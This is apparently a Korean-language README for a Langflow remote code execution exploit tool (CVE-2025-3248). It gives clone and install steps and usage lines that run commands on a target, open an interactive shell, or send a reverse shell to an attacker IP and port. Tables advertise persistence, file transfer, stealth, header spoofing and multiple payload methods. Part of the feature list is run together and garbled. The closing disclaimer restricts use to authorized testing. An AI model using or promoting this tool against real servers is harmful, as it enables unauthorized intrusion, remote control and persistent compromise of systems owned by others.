
Langflow용 원격 코드 실행 익스플로잇 (CVE-2025-3248) - [ S4Tech 제작 ]
Langflow 원격 코드 실행 익스플로잇 (CVE-2025-3248)
persist 명령)upload local_path remote_pathdownload remote_path local_pathclear 명령User-AgentX-Forwarded-For IPexploit_log.txt 파일).langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [옵션]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
⚠️ 이 도구는 교육 및 승인된 테스트 목적으로만 사용해야 합니다.
⚠️ 소유하지 않았거나 테스트 허가를 받지 않은 시스템에 대한 무단 사용은 불법입니다.
이 프로젝트는 MIT 라이선스 하에 배포됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.
풀 리퀘스트를 환영합니다. 주요 변경 사항의 경우, 먼저 이슈를 열어 변경하고자 하는 내용을 논의해 주세요.
| 기능 | v1.0 | v2.0 |
|---|
| 페이로드 방법 | 1 | 5 |
| 파일 전송 | ❌ 미지원 | ✅ 지원 |
| 지속성 | ❌ | ✅ |
| 은닉 수준 | 기본 | 고급 |
| 세션 로깅 | ❌ | ✅ |
| 옵션 | 설명 |
|---|
--shell | 대화형 셸 시작 |
--reverse IP PORT | 지정된 IP:PORT로 리버스 셸 실행 |
--command CMD | 단일 명령 실행 |
--verbose | 상세 출력 활성화 |
--timeout SEC | 요청 시간 제한 설정 (기본값: 10초) |